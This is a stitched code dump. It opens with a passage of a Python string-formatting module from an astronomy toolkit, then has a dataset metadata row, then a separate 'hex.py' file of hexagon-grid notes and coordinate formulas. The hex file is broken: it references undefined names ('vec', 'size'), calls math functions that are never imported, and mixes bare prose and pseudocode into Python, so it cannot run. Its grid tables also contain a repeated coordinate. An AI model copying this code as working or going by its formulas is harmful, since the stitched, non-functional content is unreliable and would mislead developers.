if ptype is None: ptype = parsetype
elif ptype != parsetype:
# raise ValueError("Nonuniform list")
ptype = "mixed"
# Add the parse type
ptypes.add(parsetype)
# Add the string
strings.append(val)
# Return the strings
if return_types: return strings, list(ptypes), ptype
else: return strings
# -----------------------------------------------------------------
def stringify_list(value, **kwargs):
"""
This function ...
:param value:
:param kwargs:
:return:
"""
#print("kwargs", kwargs)
#if len(value) == 0: raise ValueError("Cannot stringify an empty list")
if len(value) == 0: return "list", ""
# If delimiter is passed for stringifying the values in the list
value_kwargs = copy.copy(kwargs)
if "value_delimiter" in value_kwargs: value_kwargs["delimiter"] = value_kwargs.pop("value_delimiter")
elif "delimiter" in value_kwargs: del value_kwargs["delimiter"]
# If delimiter is passed for stringifying the keys in the list
#key_kwargs = copy.copy(kwargs)
#if "key_delimiter" in key_kwargs: key_kwargs["delimiter"] = key_kwargs.pop("key_delimiter")
#elif "delimiter" in key_kwargs: del key_kwargs["delimiter"]
# If quotes have to be added
add_quotes = kwargs.pop("add_quotes", False)
quote_character = kwargs.pop("quote_character", "'")
# Get strings
strings, ptypes, ptype = get_strings(value, return_types=True, value_kwargs=value_kwargs, add_quotes=add_quotes, quote_character=quote_character)
from ..basics.configuration import parent_type
from ..basics.log import log
if len(ptypes) == 1: ptype = ptypes[0]
elif sequences.all_equal(ptypes): ptype = ptypes[0]
else:
# Investigate the different ptypes
parent_types = [parent_type(type_name) for type_name in ptypes]
# Check
for i in range(len(parent_types)):
if parent_types[i] is None: log.warning("Could not determine the parent type for '" + ptypes[i] + "'. All parent types: " + str(parent_types))
#print("Parent types:", parent_types)
if sequences.all_equal(parent_types) and parent_types[0] is not None: ptype = parent_types[0]
elif ptype == "mixed": log.warning("Could not determine a common type for '" + stringify(parent_types)[1] + "'")
# Get delimiter for list
delimiter = kwargs.pop("delimiter", ",")
# Return the type and the string
if ptype.endswith("list"):
top_delimiter = delimiter + " "
return ptype + "_list", top_delimiter.join(strings)
else: return ptype + "_list", delimiter.join(strings)
# -----------------------------------------------------------------
def represent_dict(value, **kwargs):
"""
Thisf unction ...
:param value:
:param kwargs:
:return:
"""
if len(value) == 0: return ""
# Only for stringifying the values
value_kwargs = copy.copy(kwargs)
# If delimiter is passed for stringifying the values in the list
if "value_delimiter" in value_kwargs: value_kwargs["delimiter"] = value_kwargs.pop("value_delimiter")
# Get identify symbol
identity_symbol = kwargs.pop("identity_symbol", ": ")
quote_key = kwargs.pop("quote_key", True)
quote_value = kwargs.pop("quote_value", True)
quote_character = kwargs.pop("quote_character", "'")
# Don't quote certain thingies
no_quote_keys = kwargs.pop("no_quote_keys", [])
no_quote_value_for_keys = kwargs.pop("no_quote_value_for_keys", [])
# Do quote certain thingies
quote_keys = kwargs.pop("quote_keys", [])
quote_value_for_keys = kwargs.pop("quote_value_for_keys", [])
replace_spaces_keys = kwargs.pop("replace_spaces_keys", None)
replace_spaces_values = kwargs.pop("replace_spaces_values", None)
replace_in_keys = kwargs.pop("replace_in_keys", None)
replace_in_values = kwargs.pop("replace_in_values", None)
parts = []
# Loop over the dictionary keys
for key in value:
# Stringify the key
ktype, kstring = stringify(key, **kwargs)
if replace_spaces_keys is not None: kstring = kstring.replace(" ", replace_spaces_keys)
if replace_in_keys is not None: kstring = strings.replace_from_dict(kstring, replace_in_keys)
v = value[key]
# Stringify the value
vtype, vstring = stringify(v, **value_kwargs)
if replace_spaces_values is not None: vstring = vstring.replace(" ", replace_spaces_values)
if replace_in_values is not None: vstring = strings.replace_from_dict(vstring, replace_in_values)
# Quote keys
if quote_key:
# Don't quote after all
if key in no_quote_keys: kstring_with_quotes = kstring
# Quote
else: kstring_with_quotes = quote_character + kstring + quote_character
# Don't quote keys
else:
# Quote after all
if key in quote_keys: kstring_with_quotes = quote_character + kstring + quote_character
# Don't quote
else: kstring_with_quotes = kstring
# DON't QUOTE THESE
if vtype == "integer" or vtype == "real" or vtype == "boolean": vstring_with_quotes = vstring
# Quote values
elif quote_value:
# Don't quote after all
if key in no_quote_value_for_keys: vstring_with_quotes = vstring
# Just quote
else: vstring_with_quotes = quote_character + vstring + quote_character
# Don't quote values
else:
# DO quote after all
if key in quote_value_for_keys: vstring_with_quotes = quote_character + vstring + quote_character
# Don't quote
else: vstring_with_quotes = vstring
# Determine line
string = kstring_with_quotes + identity_symbol + vstring_with_quotes
# Add line
parts.append(string)
# Get delimiter
delimiter = kwargs.pop("delimiter", ",")
# Return
return delimiter.join(parts)
# -----------------------------------------------------------------
def stringify_dict(value, **kwargs):
"""
This function ...
:param value:
:param kwargs:
:return:
"""
#if len(value) == 0: raise ValueError("Cannot stringify an empty dictionary")
if len(value) == 0: return "dictionary", ""
keytype = None
ptype = None
parts = []
keytypes = set()
ptypes = set()
# Only for stringifying the values
value_kwargs = copy.copy(kwargs)
# If delimiter is passed for stringifying the values in the list
if "value_delimiter" in value_kwargs: value_kwargs["delimiter"] = value_kwargs.pop("value_delimiter")
# Get identify symbol
identity_symbol = kwargs.pop("identity_symbol", ": ")
quote_key = kwargs.pop("quote_key", True)
quote_value = kwargs.pop("quote_value", True)
quote_character = kwargs.pop("quote_character", "'")
# Don't quote certain thingies
no_quote_keys = kwargs.pop("no_quote_keys", [])
no_quote_value_for_keys = kwargs.pop("no_quote_value_for_keys", [])
# Do quote certain thingies
quote_keys = kwargs.pop("quote_keys", [])
quote_value_for_keys = kwargs.pop("quote_value_for_keys", [])
replace_spaces_keys = kwargs.pop("replace_spaces_keys", None)
replace_spaces_values = kwargs.pop("replace_spaces_values", None)
replace_in_keys = kwargs.pop("replace_in_keys", None)
replace_in_values = kwargs.pop("replace_in_values", None)
# Loop over the dictionary keys
for key in value:
# Stringify the key
ktype, kstring = stringify(key, **kwargs)
if replace_spaces_keys is not None: kstring = kstring.replace(" ", replace_spaces_keys)
if replace_in_keys is not None: kstring = strings.replace_from_dict(kstring, replace_in_keys)
# Add key type
keytypes.add(ktype)
# Check key type
if keytype is None: keytype = ktype
elif keytype != ktype: keytype = "mixed"
v = value[key]
# Stringify the value
vtype, vstring = stringify(v, **value_kwargs)
if replace_spaces_values is not None: vstring = vstring.replace(" ", replace_spaces_values)
if replace_in_values is not None: vstring = strings.replace_from_dict(vstring, replace_in_values)
# Add value type
ptypes.add(vtype)
# Check value type
if ptype is None: ptype = vtype
elif ptype != vtype: ptype = "mixed"
# if quote_key and key not in no_quote_keys: kstring_with_quotes = quote_character + kstring + quote_character
# else: kstring_with_quotes = kstring
# Quote keys
if quote_key:
# Don't quote after all
if key in no_quote_keys: kstring_with_quotes = kstring
# Quote
else: kstring_with_quotes = quote_character + kstring + quote_character
# Don't quote keys
else:
# Quote after all
if key in quote_keys: kstring_with_quotes = quote_character + kstring + quote_character
# Don't quote
else: kstring_with_quotes = kstring
#if ptype == "integer" or ptype == "real" or ptype == "boolean": vstring_with_quotes = vstring
#elif quote_value and key not in no_quote_value_for_keys: vstring_with_quotes = quote_character + vstring + quote_character
#else: vstring_with_quotes = vstring
# DON't QUOTE THESE
if ptype == "integer" or ptype == "real" or ptype == "boolean": vstring_with_quotes = vstring
# Quote values
elif quote_value:
# Don't quote after all
if key in no_quote_value_for_keys: vstring_with_quotes = vstring
# Just quote
else: vstring_with_quotes = quote_character + vstring + quote_character
# Don't quote values
else:
# DO quote after all
if key in quote_value_for_keys: vstring_with_quotes = quote_character + vstring + quote_character
# Don't quote
else: vstring_with_quotes = vstring
# Determine line
string = kstring_with_quotes + identity_symbol + vstring_with_quotes
# Add line
parts.append(string)
from ..basics.configuration import parent_type
from ..basics.log import log
keytypes = list(keytypes)
ptypes = list(ptypes)
# Investigate the different keytypes
parent_key_types = [parent_type(type_name) for type_name in keytypes]
#print("Parent key types:", parent_key_types)
# Check
for i in range(len(parent_key_types)):
if parent_key_types[i] is None: log.warning("Could not determine the parent type for '" + keytypes[i] + "'. All parent types: " + str(parent_key_types))
if sequences.all_equal(parent_key_types) and parent_key_types[0] is not None: ptype = parent_key_types[0]
elif keytype == "mixed": log.warning("Could not determine a common type for '" + stringify(parent_key_types)[1] + "'")
# Investigate the different value types
parent_value_types = [parent_type(type_name) for type_name in ptypes]
# Check
for i in range(len(parent_value_types)):
if parent_value_types[i] is None: log.warning("Could not determine the parent type for '" + ptypes[i] + "'. All parent types: " + str(parent_value_types))
#print("Parent value types:", parent_value_types)
if sequences.all_equal(parent_value_types) and parent_value_types[0] is not None: ptype = parent_value_types[0]
elif ptype == "mixed": log.warning("Could not determine a common type for '" + stringify(parent_value_types)[1] + "'")
# Get delimiter
delimiter = kwargs.pop("delimiter", ",")
# Return
return keytype + "_" + ptype + "_dictionary", delimiter.join(parts)
# -----------------------------------------------------------------
def stringify_array(value, **kwargs):
"""
This function ...
:param value:
:param kwargs:
:return:
"""
# Get delimiter
delimiter = kwargs.pop("delimiter", ",")
ptype, val = stringify_not_list(value[0], **kwargs)
if ptype is None: return "array", delimiter.join([repr(el) for el in value])
else: return ptype + "_array", delimiter.join([repr(el) for el in value])
#ptype, val = stringify_not_list(value[0])
#return ptype + "_array", ",".join([repr(el) for el in value])
# -----------------------------------------------------------------
def stringify_tuple(value, **kwargs):
"""
This function ...
:param value:
:param kwargs:
:return:
"""
value_kwargs = copy.copy(kwargs)
if "value_delimiter" in value_kwargs: value_kwargs["delimiter"] = value_kwargs.pop("value_delimiter")
#print("kwargs", kwargs)
strings = []
ptype = None
for entry in value:
#parsetype, val = stringify_not_list(entry, **kwargs)
parsetype, val = stringify(entry, **kwargs)
if ptype is None:
ptype = parsetype
elif ptype != parsetype:
#raise ValueError("Nonuniform tuple")
warnings.warn("Nonuniform tuple")
ptype = "mixed"
strings.append(val)
# Get delimiter
delimiter = kwargs.pop("delimiter", ",")
# Return
if ptype is not None: return ptype + "_tuple", delimiter.join(strings)
else: return "tuple", delimiter.join(strings)
# -----------------------------------------------------------------
def stringify_not_list(value, **kwargs):
"""
This function does stringify, but not for iterables
:param value:
:param kwargs:
:return:
"""
# Standard
if types.is_boolean_type(value): return "boolean", str_from_bool(value, **kwargs)
elif types.is_integer_type(value): return "integer", str_from_integer(value, **kwargs)
elif types.is_real_type(value): return "real", str_from_real(value, **kwargs)
elif types.is_string_type(value): return "string", value
elif types.is_none(value): return "None", kwargs.pop("none_string", "None")
# Unit, quantity, angle
elif introspection.lazy_isinstance(value, "UnitBase", "astropy.units"): return introspection.lazy_call("stringify_unit", "pts.core.units.stringify", value, **kwargs)
elif introspection.lazy_isinstance(value, "Quantity", "astropy.units"): return introspection.lazy_call("stringify_quantity", "pts.core.units.stringify", value, **kwargs)
elif introspection.lazy_isinstance(value, "Angle", "astropy.coordinates"): return "angle", str_from_angle(value, **kwargs)
# Range
elif introspection.lazy_isinstance(value, "RealRange", "pts.core.basics.range"): return "real_range", str_from_real_range(value, **kwargs)
elif introspection.lazy_isinstance(value, "IntegerRange", "pts.core.basics.range"): return "integer_range", str_from_integer_range(value, **kwargs)
elif introspection.lazy_isinstance(value, "QuantityRange", "pts.core.basics.range"): return "quantity_range", introspection.lazy_call("str_from_quantity_range", "pts.core.units.stringify", value, **kwargs)
# Coordinates
elif introspection.lazy_isinstance(value, "SkyCoordinate", "pts.magic.basics.coordinate"): return "skycoordinate", str_from_coordinate(value, **kwargs)
elif introspection.lazy_isinstance(value, "PixelCoordinate", "pts.magic.basics.coordinate"): return "pixelcoordinate", str_from_pixelcoordinate(value, **kwargs)
elif introspection.lazy_isinstance(value, "PhysicalCoordinate", "pts.magic.basics.coordinate"): return "physicalcoordinate", str_from_physicalcoordinate(value, **kwargs)
# Stretch
#elif introspection.lazy_isinstance(value, "SkyStretch", "pts.magic.basics.stretch"): return "skystretch", str_from_stretch(value, **kwargs)
# Extents
elif introspection.lazy_isinstance(value, "SkyExtent", "pts.magic.basics.stretch"): return "sky_extent", str_from_angle_extent(value, **kwargs)
elif introspection.lazy_isinstance(value, "PhysicalExtent", "pts.magic.basics.stretch"): return "physical_extent", str_from_quantity_extent(value, **kwargs)
elif introspection.lazy_isinstance(value, "IntegerExtent", "pts.magic.basics.vector"): return "integer_extent", str_from_integer_extent(value, **kwargs)
elif introspection.lazy_isinstance(value, "RealExtent", "pts.magic.basics.vector"): return "real_extent", str_from_real_extent(value, **kwargs)
elif introspection.lazy_isinstance(value, "AngleExtent", "pts.magic.basics.vector"): return "angle_extent", str_from_angle_extent(value, **kwargs)
elif introspection.lazy_isinstance(value, "QuantityExtent", "pts.magic.basics.vector"): return "quantity_extent", str_from_quantity_extent(value, **kwargs)
# Filter
elif introspection.lazy_isinstance(value, "Filter", "pts.core.filter.filter"): return introspection.lazy_call("stringify_filter", "pts.core.filter.filter", value, **kwargs)
# Pixelscale
elif introspection.lazy_isinstance(value, "Pixelscale", "pts.magic.basics.pixelscale"): return "pixelscale", str(value)
# Parallelization
elif introspection.lazy_isinstance(value, "Parallelization", "pts.core.simulation.parallelization"): return "parallelization", introspection.lazy_call("represent_parallelization", "pts.core.simulation.parallelization", value)
# Host
elif introspection.lazy_isinstance(value, "Host", "pts.core.remote.host"): return "host", str_from_host(value)
# Unrecognized
else:
warnings.warn("Unrecognized type: " + str(type(value)))
return None, str(value)
# -----------------------------------------------------------------
def str_from_host(host):
"""
This function ...
:param host:
:return:
"""
if host.cluster_name is not None: return host.id + ":" + host.cluster_name
else: return host.id
# -----------------------------------------------------------------
def str_from_dictionary(dictionary, **kwargs):
"""
This function ...
:param dictionary:
:param kwargs:
:return:
"""
parts = []
for key in dictionary:
value = dictionary[key]
vtype, vstring = stringify(value, **kwargs)
string = key + ": " + vstring
parts.append(string)
return ",".join(parts)
# -----------------------------------------------------------------
def stringify_string_fancy(string, **kwargs):
"""
This function ...
:param string:
:return:
"""
width = kwargs.pop("width", 100)
lines_prefix = kwargs.pop("lines_prefix", "")
from textwrap import wrap
return "string", lines_prefix + ("\n" + lines_prefix).join(wrap(string, width))
# -----------------------------------------------------------------
def stringify_list_fancy(lst, **kwargs):
"""
This function ...
:param lst:
:param kwargs:
:return:
"""
width = kwargs.pop("width", 100)
delimiter = kwargs.pop("delimiter", ", ")
lines_prefix = kwargs.pop("lines_prefix", "")
colour = kwargs.pop("colour", None)
colour_indices = kwargs.pop("colour_indices", None) # colour only certain indices
from textwrap import wrap
ptype, string = stringify(lst)
if colour is not None:
from .formatting import get_color_code, reset
code = get_color_code(colour)
if colour_indices is not None:
parts = string.split(",")
new_parts = []
for index, part in enumerate(parts):
if index in colour_indices: new_part = code + part + reset
else: new_part = part
new_parts.append(new_part)
string = ",".join(new_parts)
else: string = code + string + reset
return ptype, lines_prefix + ("\n" + lines_prefix).join(wrap(string.replace(",", delimiter), width))
# -----------------------------------------------------------------
def get_list_string_max_nvalues(lst, nvalues, **kwargs):
"""
This function ...
:param lst:
:param values:
:param kwargs:
:return:
"""
# Define string
ellipsis = ", ... , "
# Get options
delimiter = kwargs.pop("delimiter", ", ")
# Get strings
strings = get_strings(lst)
# Return
if len(lst) <= nvalues: return delimiter.join(strings)
# Add ellipses
else:
if nvalues % 2 == 0: nbegin = nend = int(0.5 * nvalues)
else:
nbegin = int(0.5 * nvalues)
nend = nvalues - nbegin
# Create string, return
return delimiter.join(strings[:nbegin]) + ellipsis + delimiter.join(strings[-nend:])
# -----------------------------------------------------------------
def stringify_paths(paths, **kwargs):
"""
This function ...
:param paths:
:param kwargs:
:return:
"""
# Get options
base = kwargs.pop("basse", None)
if base is None: return "path_list", stringify_list(paths)[1]
else:
from . import filesystem as fs
absolute_base = fs.absolute_path(base)
# Return the type and the relative paths as a string list
return "string_list", stringify_list([fs.absolute_path(path).split(absolute_base)[1] for path in paths])[1]
# -----------------------------------------------------------------
def str_from_integer(integer, **kwargs):
"""
This function ...
:param integer:
:param kwargs:
:return:
"""
# Get settings
scientific = kwargs.pop("scientific", False)
decimal_places = kwargs.pop("decimal_places", None)
fancy = kwargs.pop("fancy", False)
ndigits = kwargs.pop("ndigits", None)
unicode = kwargs.pop("unicode", False)
html = kwargs.pop("html", False)
# Check input
if ndigits is not None and ndigits < 1: raise ValueError("Number of digits cannot be smaller than 1")
if ndigits is not None and decimal_places is not None: raise ValueError("Cannot specify both number of decimal places and number of digits")
# Set ndigits and number of decimal places
if ndigits is not None:
if scientific: decimal_places = ndigits - 1
else: pass
elif decimal_places is not None:
if scientific: ndigits = decimal_places + 1
else: pass
else: decimal_places = 2 # default value for when ndigits is not specified
#print(scientific, decimal_places, ndigits)
# Scientific notation
if scientific:
if fancy:
if ndigits is not None:
power = len(str(integer)) - 1
digits = []
str_rounded = str(integer)
for i in range(ndigits):
digit = str_rounded[i]
digits.append(digit)
if html: return digits[0] + "." + "".join(digits[1:]) + " × 10<sup>" + str(power) + "</sup>"
elif unicode: return digits[0].decode("utf8") + u"." + u"".join(digits[1:]) + u" " + strings.multiplication + u" 10" + strings.superscript(power) # DOESN'T WORK??
else: return digits[0] + "." + "".join(digits[1:]) + " x 10^" + str(power)
else:
result = "{:.0e}".format(integer).replace("+", "").replace("e0", "e")
power = int(result.split("e")[1])
if html: result = result.split("e")[0] + " × 10<sup>" + str(power) + "</sup>"
elif unicode: result = result.split("e")[0].decode("utf8") + u" " + strings.multiplication + u" 10" + strings.superscript(power) # DOESN'T WORK
else: result = result.split("e")[0] + " x 10^" + str(power)
return result
else:
if ndigits is not None: decimal_places = ndigits - 1
if html: return ("{:." + str(decimal_places) + "e}").format(float(integer)).replace("+", "").replace("e0", " × 10<sup>") + "</sup>"
else: return ("{:." + str(decimal_places) + "e}").format(float(integer)).replace("+", "").replace("e0", "e")
# Not scientific
else: return str(integer)
# -----------------------------------------------------------------
#def str_from_integer_range(the_range, scientific=False, decimal_places=2, fancy=False, ndigits=None, unicode=False, **kwargs):
def str_from_integer_range(the_range, **kwargs):
"""
Thi function ...
:param the_range:
:param kwargs:
:return:
"""
min_str = str_from_integer(the_range.min, **kwargs)
max_str = str_from_integer(the_range.max, **kwargs)
return min_str + " > " + max_str
# -----------------------------------------------------------------
def str_from_real(real, **kwargs):
"""
This function ...
:param real:
:param kwargs:
:return:
"""
# Get kwargs
scientific = kwargs.pop("scientific", False)
decimal_places = kwargs.pop("decimal_places", None)
fancy = kwargs.pop("fancy", False)
ndigits = kwargs.pop("ndigits", None)
unicode = kwargs.pop("unicode", False)
doround = kwargs.pop("round", False)
html = kwargs.pop("html", False)
#print(decimal_places, ndigits)
# Check input
if ndigits is not None and ndigits < 1: raise ValueError("Number of digits cannot be smaller than 1")
if ndigits is not None and decimal_places is not None: raise ValueError("Cannot specify both number of decimal places and number of digits")
# Set ndigits and number of decimal places
if ndigits is not None:
if scientific: decimal_places = ndigits - 1
else: pass
elif decimal_places is not None:
if scientific: ndigits = decimal_places + 1
else: pass
else: decimal_places = 2 # default value for when ndigits is not specified
#print(decimal_places, ndigits)
# Scientific notation
if scientific:
# Fancy
if fancy:
if ndigits is not None:
if "e" in str(real): power = int(str(real).split("e")[1])
else: power = len(str(real).split(".")[0]) - 1
digits = []
rounded = numbers.round_to_n_significant_digits(real, ndigits)
str_rounded = str(rounded)
#print(str_rounded)
#if "." in str_rounded: enditeration = ndigits + 1
#else: enditeration = ndigits
if "." in str_rounded: str_rounded = "".join(str_rounded.split("."))
for i in range(ndigits):
digit = str_rounded[i]
#if digit == ".": continue # happens if rounded does stil contain dot
digits.append(digit)
#print("digits", digits)
if html: return digits[0] + "." + "".join(digits[1:]) + " × 10<sup>" + str(power) + "</sup>"
elif unicode: return digits[0].decode("utf8") + u"." + u"".join(digits[1:]) + u" " + strings.multiplication + u" 10" + strings.superscript(power).decode("utf8") # DOESN'T WORK??
else: return digits[0] + "." + "".join(digits[1:]) + " x 10^" + str(power)
else:
result = ("{:." + str(decimal_places) + "e}").format(real).replace("+", "").replace("e0", "e")
power = int(result.split("e")[1])
#result = result.split("e")[0].decode("utf8") + u" " + strings.multiplication + u" 10" + strings.superscript(power).decode("utf8")
#result = result.split("e")[0].decode("utf8") + u" " + strings.multiplication + u" 10" + strings.superscript(power).decode("utf8")
if html: result = result.split("e")[0] + " × 10<sup>" + str(power) + "</sup>"
elif unicode: result = result.split("e")[0].decode("utf8") + u" " + u"x" + u" 10" + strings.superscript(power).decode("utf8") # SOMETHING LIKE THIS?? DOESN'T WORK??
else: result = result.split("e")[0] + " x 10^" + str(power)
return result
else:
if ndigits is not None: decimal_places = ndigits - 1
if html: return ("{:." + str(decimal_places) + "e}").format(real).replace("+", "").replace("e0", " × 10<sup>") + "</sup>"
else: return ("{:." + str(decimal_places) + "e}").format(real).replace("+", "").replace("e0", "e")
else:
if doround:
#numbers.order_of_magnitude()
if ndigits is not None: return repr(numbers.round_to_n_significant_digits(real, ndigits))
else:
primary_ndigits = numbers.order_of_magnitude(real) + 1
ndigits = decimal_places + primary_ndigits
if ndigits < 1:
warnings.warn("The small number '" + repr(real) + "' cannot be represented with only " + str(decimal_places) + " decimal places: using scientific notation")
return str_from_real(real, scientific=True, ndigits=decimal_places+1)
else:
#print(decimal_places, primary_ndigits, ndigits)
return ("{:." + str(ndigits) + "}").format(real)
else: return repr(real)
# -----------------------------------------------------------------
#def str_from_real_range(the_range, scientific=False, decimal_places=2, fancy=False, ndigits=None, unicode=False, **kwargs):
def str_from_real_range(the_range, **kwargs):
"""
This function ...
:param the_range:
:param kwargs:
:return:
"""
min_str = str_from_real(the_range.min, **kwargs)
max_str = str_from_real(the_range.max, **kwargs)
return min_str + " > " + max_str
# -----------------------------------------------------------------
def str_from_coordinate(coordinate, **kwargs):
"""
This function ...
:param coordinate:
:param kwargs:
:return:
"""
delimiter = kwargs.pop("delimiter", ",")
# Return
return introspection.lazy_call("stringify_quantity", "pts.core.units.stringify", coordinate.ra, **kwargs)[1] + delimiter + introspection.lazy_call("stringify_quantity", "pts.core.units.stringify", coordinate.dec, **kwargs)[1]
# -----------------------------------------------------------------
def str_from_pixelcoordinate(coordinate, **kwargs):
"""
This function ...
:param coordinate:
:param kwargs:
:return:
"""
delimiter = kwargs.pop("delimiter", ",")
# Return
return repr(coordinate.x) + delimiter + repr(coordinate.y)
# -----------------------------------------------------------------
def str_from_physicalcoordinate(coordinate, **kwargs):
"""
This function ...
:param coordinate:
:param kwargs:
:return:
"""
delimiter = kwargs.pop("delimiter", ",")
# Return
return introspection.lazy_call("stringify_quantity", "pts.core.units.stringify", coordinate.x, **kwargs)[1] + delimiter + introspection.lazy_call("stringify_quantity", "pts.core.units.stringify", coordinate.y, **kwargs)[1]
# -----------------------------------------------------------------
def str_from_stretch(stretch, **kwargs):
"""
This function ...
:param stretch:
:param kwargs:
:return:
"""
delimiter = kwargs.pop("delimiter", ",")
# Return
return introspection.lazy_call("stringify_quantity", "pts.core.units.stringify", stretch.ra,
**kwargs)[1] + delimiter + introspection.lazy_call("stringify_quantity",
"pts.core.units.stringify",
stretch.dec, **kwargs)[1]
# -----------------------------------------------------------------
def str_from_angle_extent(extent, **kwargs):
"""
This function ...
:param extent:
:param kwargs:
:return:
"""
delimiter = kwargs.pop("delimiter", ",")
# Return
return str_from_angle(extent.x, **kwargs) + delimiter + str_from_angle(extent.y, **kwargs)
# -----------------------------------------------------------------
def str_from_quantity_extent(extent, **kwargs):
"""
Thisf unction ...
:param extent:
:param kwargs:
:return:
"""
delimiter = kwargs.pop("delimiter", ",")
# Return
return introspection.lazy_call("stringify_quantity", "pts.core.units.stringify", extent.x, **kwargs)[1] + delimiter + \
introspection.lazy_call("stringify_quantity", "pts.core.units.stringify", extent.y, **kwargs)[1]
# -----------------------------------------------------------------
def str_from_integer_extent(extent, **kwargs):
"""
This function ...
:param extent:
:param kwargs:
:return:
"""
delimiter = kwargs.pop("delimiter", ",")
# Return
return str_from_integer(extent.x, **kwargs) + delimiter + str_from_integer(extent.y, **kwargs)
# -----------------------------------------------------------------
def str_from_real_extent(extent, **kwargs):
"""
This function ...
:param extent:
:param kwargs:
:return:
"""
delimiter = kwargs.pop("delimiter", ",")
# Return
return str_from_real(extent.x, **kwargs) + delimiter + str_from_real(extent.y, **kwargs)
# -----------------------------------------------------------------
def yes_or_no(boolean, **kwargs):
"""
This function ...
:param boolean:
:param kwargs:
:return:
"""
# Get options
short = kwargs.pop("short", False)
answer = "yes" if boolean else "no"
if short: return answer[0]
else: return answer
# -----------------------------------------------------------------
def str_from_bool(boolean, **kwargs):
"""
This function ...
:param boolean:
:param kwargs:
:return:
"""
# Get options
lower = kwargs.pop("lower", False)
if lower: return str(boolean).lower()
else: return str(boolean)
# -----------------------------------------------------------------
def str_from_angle(angle, **kwargs):
"""
This function ...
:param angle:
:param kwargs:
:return:
"""
return str_from_real(angle.value, **kwargs) + " " + str(angle.unit).replace(" ", "")
# -----------------------------------------------------------------
| agpl-3.0 | -4,237,823,556,950,689,000 | 32.980198 | 229 | 0.577846 | false | 3.923033 | false | false | false |
ZuraK/aVarCode | py_prototyping/hex.py | 1 | 7514 | # File:
# Desc:
import math;
# param: hType, hexType, 0 for Flat topped, 30 if Pointy topped
# param: center, Vector2Point, hex center
# param: radius, size of hex
# param: index, indexPoint corner of hex, 0-5
# returns: Vector2Point hex corner
def GeneratePointHEX(hType, center, radius, index):
vec[0];
angle_deg = 60 * index + hType; # 0 if Flat, 30 if Pointy
angle_rad = math.pi / 180 * angle_deg;
vec[0].x = center.x + size * cos(angle_rad);
vec[0].y = center.y + size * sin(angle_rad);
return vec;
# param: hType, hexType, 0 for Flat topped, 30 if Pointy topped
# param: center, Vector2Point, hex center
# param: radius, size of hex
# returns: Vector2[] hex corners
def GenerateVectorsHEX(hType, center, radius):
vec[0];
for val in range(6):
angle_deg = 60 * val + hType; # 0 if Flat, 30 if Pointy
angle_rad = math.pi / 180 * angle_deg;
vec[val].x = center.x + size * cos(angle_rad);
vec[val].y = center.y + size * sin(angle_rad);
return vec;
def PrintInfo():
print "=====[[ Hexagons ]]=====";
print "(00) Definitons, Equations, ";
print "(01) Storage, Tables, "
print "(02) Generation, ";
return;
# HexEdges, Indices
# A 0,1;
# B 1,2;
# C 2,3;
# D 3,4;
# E 4,5;
# F 5,0;
# HexTriangles, Indices (Index 6 as Center)
# A 6,0,1;
# B 6,1,2;
# etc
# Triangle Fan -> Center(0),First(1),Second(2), ...
# Hexagon area:
# A = ((3 sqrt 3) / 2 ) size^2
# Perimeter: 6 * size
# Slices 60 deg, 60 deg, 60 deg
# Total internal angles: 720 deg
# Internal angle: 120 deg
#
dirs:
flat
Lines: East, SouthEast, SouthWest, West, NorthWest, NorthEast
Edges: SouthEast, South, SouthWest, NorthWest, North, NorthEast
pointy
Lines: SouthEast, South, SouthWest, NorthWest, North, NorthEast
Edges: East, SouthEast, SouthWest, West, NorthWest, NorthEast
# Unicode Character 'WHITE HEXAGON' (U+2B21)
# HTML Entity (decimal) ⬡
# HTML Entity (hex) ⬡
# How to type in Microsoft Windows Alt +2B21
# UTF-8 (hex) 0xE2 0xAC 0xA1 (e2aca1)
# UTF-8 (binary) 11100010:10101100:10100001
# UTF-16 (hex) 0x2B21 (2b21)
# UTF-16 (decimal) 11,041
# UTF-32 (hex) 0x00002B21 (2B21)
# UTF-32 (decimal) 11,041
# C/C++/Java source code "\u2B21"
# Python source code u"\u2B21"
# Unicode Character 'BLACK HEXAGON' (U+2B22)
# HTML Entity (decimal) ⬢
# HTML Entity (hex) ⬢
# How to type in Microsoft Windows Alt +2B22
# UTF-8 (hex) 0xE2 0xAC 0xA2 (e2aca2)
# UTF-8 (binary) 11100010:10101100:10100010
# UTF-16 (hex) 0x2B22 (2b22)
# UTF-16 (decimal) 11,042
# UTF-32 (hex) 0x00002B22 (2b22)
# UTF-32 (decimal) 11,042
# C/C++/Java source code "\u2B22"
# Python source code u"\u2B22"
# hex grid flat, vertical orientation
# Width = HexSize * 2
# horiz = width * 3/4
# height = sqrt(3)/2 * width.
# dist vertical = height.
# hex grid pointy, horizontal orientation
# height = hxsize * 2
# vert = height * 3/4
# width = sqrt(3)/2 * height.
# dist horiz = width.
offset coords
# Pointy top Pointy top
# "odd-r" Horizontal layout "even-r" Horizontal layout
# (0,0) (1,0) (2,0) (3,0) (4,0) (0,0) (1,0) (2,0) (3,0) (4,0)
# (0,1) (1,1) (2,1) (3,1) (4,1) (0,1) (1,1) (2,1) (3,1) (4,1)
# (0,2) (1,2) (2,2) (3,2) (4,2) (0,2) (1,2) (2,2) (3,2) (4,2)
# (0,3) (1,3) (2,3) (3,3) (4,3) (0,3) (1,3) (2,3) (3,3) (4,3)
# (0,4) (1,4) (2,4) (3,4) (4,4) (0,4) (1,4) (2,4) (3,4) (4,4)
# Flat top Flat top
# "odd-q" Vertical layout "even-q" Vertical layout
# (0,0) (2,0) (4,0) (1,0) (3,0) (5,0)
# (1,0) (3,0) (5,0) (0,0) (2,0) (4,0)
# (0,1) (2,1) (4,1) (1,1) (3,1) (5,1)
# (1,1) (3,1) (4,1) (0,1) (2,1) (4,1)
# (0,2) (2,2) (4,2) (1,2) (3,2) (5,2)
# (1,2) (3,2) (5,2) (0,2) (2,2) (4,2)
cube coords
axial coords
interlaced/doubled coords
Coord conversions::
function cube_to_hex(h): # axial
var q = h.x
var r = h.z
return Hex(q, r)
function hex_to_cube(h): # axial
var x = h.q
var z = h.r
var y = -x-z
return Cube(x, y, z)
# convert cube to even-q offset
col = x
row = z + (x + (x&1)) / 2
# convert even-q offset to cube
x = col
z = row - (col + (col&1)) / 2
y = -x-z
# convert cube to odd-q offset
col = x
row = z + (x - (x&1)) / 2
# convert odd-q offset to cube
x = col
z = row - (col - (col&1)) / 2
y = -x-z
# convert cube to even-r offset
col = x + (z + (z&1)) / 2
row = z
# convert even-r offset to cube
x = col - (row + (row&1)) / 2
z = row
y = -x-z
# convert cube to odd-r offset
col = x + (z - (z&1)) / 2
row = z
# convert odd-r offset to cube
x = col - (row - (row&1)) / 2
z = row
